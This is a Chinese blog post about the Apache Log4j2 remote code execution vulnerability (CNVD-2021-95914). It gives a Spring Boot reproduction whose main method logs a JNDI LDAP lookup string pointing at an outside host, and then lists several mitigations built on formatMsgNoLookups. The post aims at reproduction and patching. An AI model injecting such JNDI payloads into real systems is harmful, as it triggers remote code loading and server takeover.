【Apache Log4j2远程代码执行漏洞--解决方案】

最新推荐文章于 2024-05-21 09:10:26 发布
最新推荐文章于 2024-05-21 09:10:26 发布
阅读量977 收藏 1
点赞数
分类专栏: 工作整理 文章标签: java spring log4j2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iBuDongIt/article/details/121953231
版权
Apache Log4j2 存在远程代码执行漏洞,攻击者可利用此漏洞通过构造特定请求获取服务器权限。漏洞编号CNVD-2021-95914。解决方案包括在JVM参数中添加-Dlog4j2.formatMsgNoLookups=true,或创建log4j2.component.properties文件进行配置。测试有效的方法为1和4。
摘要由CSDN通过智能技术生成

Apache Log4j2远程代码执行漏洞--解决方案

漏洞说明

Apache Log4j 2是对Log4j的升级,它比其前身Log4j 1.x提供了重大改进,并提供了Logback中可用的许多改进,被广泛应用于业务系统开发,用以记录程序输入输出日志信息。是目前较为优秀的Java日志框架。由于Apache Log4j2某些功能存在递归解析功能,攻击者可通过构造指定的恶意请求,触发远程代码执行从而获取服务器权限。

漏洞编号

CNVD-2021-95914

漏洞复现

  1. 前往:https://start.spring.io/ 下载初始项目
  2. 修改 pom.xml 文件,排除 springboot 默认的日志处理组件 slf4j,替换为 log4j,如下:
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
		 xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
	<modelVersion>4.0.0</modelVersion>

	<groupId>com.taps</groupId>
	<artifactId>demo</artifactId>
	<version>1.0</version>
	<packaging>jar</packaging>

	<parent>
		<groupId>org.springframework.boot</groupId>
		<artifactId>spring-boot-starter-parent</artifactId>
		<version>2.6.1</version>
		<relativePath/> <!-- lookup parent from repository -->
	</parent>

	<description>Demo project for Spring Boot</description>
	<properties>
		<java.version>1.8</java.version>
	</properties>
	<dependencies>
		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter</artifactId>
			<exclusions>
				<exclusion>
					<groupId>org.springframework.boot</groupId>
					<artifactId>spring-boot-starter-logging</artifactId>
				</exclusion>
			</exclusions>
		</dependency>

		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-test</artifactId>
			<scope>test</scope>
		</dependency>

		<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-log4j2</artifactId>
		</dependency>

		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-web</artifactId>
		</dependency>
	</dependencies>

	<build>
		<finalName>SpringVulExample</finalName>
		<plugins>
			<plugin>
				<groupId>org.springframework.boot</groupId>
				<artifactId>spring-boot-maven-plugin</artifactId>
			</plugin>
		</plugins>
	</build>
</project>
  1. 在 Spring Application 的 Main 方法中增加如下代码 后面的请求可以改成自己的 :
@SpringBootApplication
public class DemoApplication {
	private static final Logger LOGGER = (Logger) LogManager.getLogger();
	public static void main(String[] args) {
		//${jndi:ldap://url}  url为你的服务请求地址
		LOGGER.error("${jndi:ldap://192.168.1.142:12402/hello}");
		SpringApplication.run(DemoApplication.class, args);
	}

}

4 构建项目并启动, 在另一个12402服务中会看到 192.168.1.142:12402 这个接口被请求过来. 此时就会触发JNDI 注入

漏洞解决

以下任选一个即可 (本人测试了1 和4 是有效的, 其他的没有经过本人亲自测试)

  • (1)在jvm参数中添加 -Dlog4j2.formatMsgNoLookups=true 【针对 2.10.0 及以上的版本】
  • (2)系统环境变量中将FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true 【针对 2.10.0 及以上的版本】
  • (3)建议JDK使用11.0.1、8u191、7u201、6u211及以上的高版本
  • (4)在项目的resources 目录下 创建“log4j2.component.properties”文件,文件中增加配置“log4j2.formatMsgNoLookups=true” 【针对 2.10.0 及以上的版本】

如果你是在linux 测试

java -jar -Dlog4j2.formatMsgNoLookups=true ./demo_no.jar

windows

java  -Dlog4j-formatMsgNoLookups=true  -jar .\demo_no.jar
iBuDongIt
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】Apache Log4j2 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
07-20 888
ApacheLog4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。......
Apache Log4j2 远程代码执行漏洞 学习
YouthBelief的博客
12-12 3497
Apache Log4j0x00 前言0x01 漏洞描述0x02 影响范围0x03 环境搭建0x04 漏洞复现0x05 修复方法0x06 总结 所有文章,仅供安全研究与学习之用,后果自负! 0x00 前言 Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。 0x01 漏洞描述 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配
Apache log4j2远程代码执行漏洞
最新发布
持 开源思想,撰 必胜所学,望 勤学者,无难处
05-21 187
该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。此次漏洞触发条件为只要外部用户输入的数据会被日志记录,即可造成远程代码执行。2、若项目使用Maven打包,查看项目pom文件是否存在groupId包含log4j的依赖。1、检查Java应用是否引入log4j-api,log4j-core两个jar。1、官方已于2021年12月10日发布新版本修复该漏洞,请尽快升级至安全版本。
漏洞处置方案】Apache Log4j2远程代码执行漏洞&对外技术支持服务
weixin_40418457的博客
12-10 3555
昨日,Apache Log4j2 成为知名漏洞,其危害性使得该漏洞吸引了安全圈所有人的目光。火线安全为防止其继续扩大影响范围,特发布针对该漏洞的处置方案。 漏洞描述 Apache Log4j 2是对Log4j的升级,它比其前身Log4j 1.x提供了重大改进,并提供了Logback中可用的许多改进,被广泛应用于业务系统开发,用以记录程序输入输出日志信息。是目前较为优秀的Java日志框架。由于Apache Log4j2某些功能存在递归解析功能,攻击者可通过构造指定的恶意请求,触发远程代码执行从而获取服务器权限
Apache Log4j2远程代码执行漏洞
qq_26622469的博客
12-16 2111
漏洞分析 组件介绍 Apache Log4j2 是一款Java日志框架,是Log4j 的升级版。可以控制每一条日志的输出格式。通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。由于其易用性被广泛集成于各种服务器和组件中。 漏洞描述 2021年12月9日,深信服安全团队监测到一则Apache Log4j2 组件存在远程代码执行漏洞的信息,并成功复现该漏洞漏洞编号:CNVD-2021-95914。漏洞威胁等级:严重。 该漏洞是由于 Apache Log4j2 某些功能存在递归解析功能,
log4j2远程代码执行漏洞原因以及解决方案
mischen520的博客
12-20 5405
log4j2漏洞解决方案
apache-log4j-2.16.0-bin.rar
12-17
总之,Apache Log4j2的这个远程代码执行漏洞是一个严重的安全问题,及时升级到2.16.0或更高版本是保护系统免受攻击的关键。企业应当制定并实施有效的安全策略,包括定期更新软件组件,监控系统日志以检测异常行为,...
logging-log4j2-rel-2.17.0.zip
12-20
7. **安全性**:Log4j 2.17.0版本着重解决了2021年底爆出的Log4Shell漏洞(CVE-2021-44228),这是一个严重级别的远程代码执行漏洞,影响了全球大量Java应用。此更新旨在保护用户免受此类攻击。 8. **性能优化**:...
apache-log4j-2.9.1-bin
05-23
然而,值得注意的是,Log4j曾爆出严重的CVE-2021-44228漏洞,也被称为Log4Shell,这是一个远程代码执行漏洞,影响了大量使用Log4j的系统。因此,即使使用的是2.9.1版本,也需要时刻关注最新的安全更新,以防类似的...
log4j-2.15.0-rc2.zip
12-10
Log4Shell,又称为CVE-2021-44228,是一个极其严重的远程代码执行(RCE)漏洞,影响了Log4j 2.x版本。这个漏洞允许攻击者通过精心构造的JNDI(Java Naming and Directory Interface)链接来注入恶意代码,进而执行...
log4j2漏洞检测工具
05-07
4. **修复漏洞**: 根据报告提供的指导,更新Log4j2到不受影响的版本,或者应用临时解决方案,如禁用JNDI查找功能。 5. **验证修复**: 再次运行检测工具,确保所有漏洞都已修复。 6. **持续监控**: 设置定期扫描,...
Apache Log4j2远程代码执行漏洞(CVE-2021-44228)漏洞复现
weixin_51804748的博客
03-18 6863
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
Apache Log4j2 远程代码执行 漏洞
马春林的专栏
12-10 3452
log4j安全漏洞
漏洞研究》Apache Log4j2 远程代码执行漏洞
1
11-04 1649
Apache Log4j2 组件存在远程代码执行漏洞(CVE-2021-44228),该漏洞是由于 Apache Log4j2 某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码
【紧急】Apache Log4j2 远程代码执行漏洞
qq_18209847的博客
04-03 4018
0x01 漏洞背景 12月9日,监测到网上披露Apache Log4j2 远程代码执行漏洞,由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特别构造的数据请求包,可在目标服务器上执行任意代码漏洞PoC已在网上公开,默认配置即可进行利用,该漏洞影响范围极广,建议相关用户尽快采取措施进行排查与防护。 0x02 风险等级 严重 0x03 影响版本 受影响版本: Apache Log4j 2.x < 2.15.0-rc2 0x04 供应链影响范围: 已知受影
Apache Log4j2远程代码执行漏洞
F2444790591的博客
07-08 7958
1、下载、解压、重命名vulhub-master.zip为vulhub 2、进入漏洞环境下,启动该环境。 3、访问目标靶场: 4、在Dnslog.cn中生成接收信息的域名 。 5、提交dnslog payload 参数,进行访问。 6、可以发现dnslog接收到返回的信息,证明存在log4
Apache Log4j2 远程代码执行漏洞
qq_39912230的博客
12-13 3907
· 漏洞描述 Apache Log4j2是一款非常优秀的Java日志框架,在各大Java项目中广泛应用。12月9日,Apache官方发布了紧急安全更新,修复了Apache Log4j2中发现的远程代码执行漏洞。 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,Apache Struts2、Apache SolrApache Druid、Apache Flink等均受影响。漏洞风险评级为严重。 ·影响版本 Apache Log4j
灭世之Apache Log4j2 远程代码执行漏洞
tangshuangsss的专栏
12-11 421
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介网上披露Apache Log4j2 远程代码执行漏洞,由于Apache Log4j2某些功能存在递归解析功...
apache log4j2远程代码执行漏洞检测工具
08-31
Apache Log4j2远程代码执行漏洞是一种影响Apache Log4j2日志记录库的严重安全漏洞。该漏洞允许攻击者通过发送特制的网络请求,远程执行任意代码,导致服务器完全被控制。 为了帮助检测这个漏洞,一些安全公司和社区...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值